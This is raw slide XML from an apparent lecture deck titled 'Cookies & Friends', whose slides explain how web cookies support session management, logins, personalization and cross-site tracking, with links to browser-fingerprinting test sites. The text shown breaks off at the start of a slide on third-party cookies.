    <p:body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en.wikipedia.org/wiki/Plugin"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7.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en.wikipedia.org/wiki/JBoss" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide48.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Cleartext" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Digest_access_authentication#cite_note-3" TargetMode="Externa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www.browserleaks.com/canvas" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://panopticlick.eff.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://browserspy.dk/" TargetMode="Externa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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30D0B1D2-FB36-4F59-AD9B-B5553A8B2BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT"/>
              <a:t>Cookies &amp; Friends</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Sottotitolo 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4702870A-230B-43F0-92BD-151E816B5B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT"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70D7ABD-5B09-438B-AE7B-D43F5F84650E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cookies (continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2489730-E314-4679-B902-654DEF284CF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1477963"/>
            <a:ext cx="3810000" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="ZapfDingbats"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What cookies can help for:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>shopping carts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>recommendations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>user session state (e.g. Web e-mail)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29700" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C843FB3D-0EC0-49FA-977A-CC8F7F8867B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6435725" y="1411288"/>
            <a:ext cx="3810000" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="190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buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cookies &amp; privacy:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies permit sites to learn a lot about you</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the search engines use redirection and cookies for many purposes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cookies can be exchanged from one site to another</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29701" name="Text Box 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B9377FD-382A-4FBB-A11A-6346896E87A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8845550" y="1177926"/>
            <a:ext cx="674688"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2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS" panose="030F0702030302020204" pitchFamily="66" charset="0"/>
              </a:rPr>
              <a:t>N.B.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B571DA6F-C79E-4C80-A258-D4828DCE0781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" b="1"/>
              <a:t>Uses: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1"/>
              <a:t>Session management</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{737E252E-4026-42AE-BF85-1FB2CD609BD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to maintain data related to the user during navigation, possibly across multiple visits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cookies were introduced to provide a way to implement a "shopping cart" (or "shopping basket"), a virtual device into which users can store items they want to purchase as they navigate throughout the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today the basket contents are stored in a database on the server side, rather than storing basket items in the cookie itself. A web server typically sends a cookie containing a unique session identifier. The web browser will send back that session identifier with each subsequent request and shopping basket items are stored associated with a unique session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to allow users to log into a website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before authentication, the web server will first set a cookie containing a unique session identifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users then submit their credentials and the web application authenticates the session and allows the user access to services</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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FB5CE0-4E36-4F68-8751-69EDDA438C12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1"/>
              <a:t>Personalization</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1319A5B-071E-47F2-B3CB-A51A622B40FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="5043488"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A web server may send a cookie containing the username last used to log into a website so that it may be filled in for future visits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many websites use cookies for personalization based on users' preferences. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Users select their preferences by entering them in a web form and submitting the form to the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The server encodes the preferences in a cookie and sends the cookie back to the browser. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every time the user accesses a page, the server is also sent the cookie where the preferences are stored, and can personalize the page according to the user preferences. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wikipedia website allows authenticated users to choose the webpage skin they like best; the Google search engine once allowed users (even non-registered ones) to decide how many search results per page they want to see</a:t>
            </a:r>
            <a:endParaRPr lang="it-I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1CDB8B-52C4-48E7-AA25-022882EDEE88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0" err="1"/>
              <a:t>Uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0" err="1"/>
              <a:t>Tracking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD6AFFB3-FDD7-4425-AAF8-291B7866AF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="1600200"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Tracking cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>may be used to track internet users' web browsing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user requests a page of a given site, but the request contains no cookie, the server presumes that this is the first page visited by the user; the server creates a random string and sends it as a cookie back to the browser together with the requested page;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested; the server sends the page as usual, but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By analyzing the log file collected in the process, it is then possible to find out which pages the user has visited, in what sequence, for how long, no matter of his IP number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracking on a site used to produce statistics</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracking on multiple sites is used to produce anonymous user profiles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Useful for determining what kind of advertisements should be shown to users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A tracking cookie may violate a user's privacy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be removed, many web browsers offer functionality in this sense</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"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8671B65-8913-4052-B88F-E66DD8B97C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="it-IT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" b="1" i="1" dirty="0"/>
              <a:t>Third-party cookies</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57A58378-F10A-44D7-9913-FFF87D1E1623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
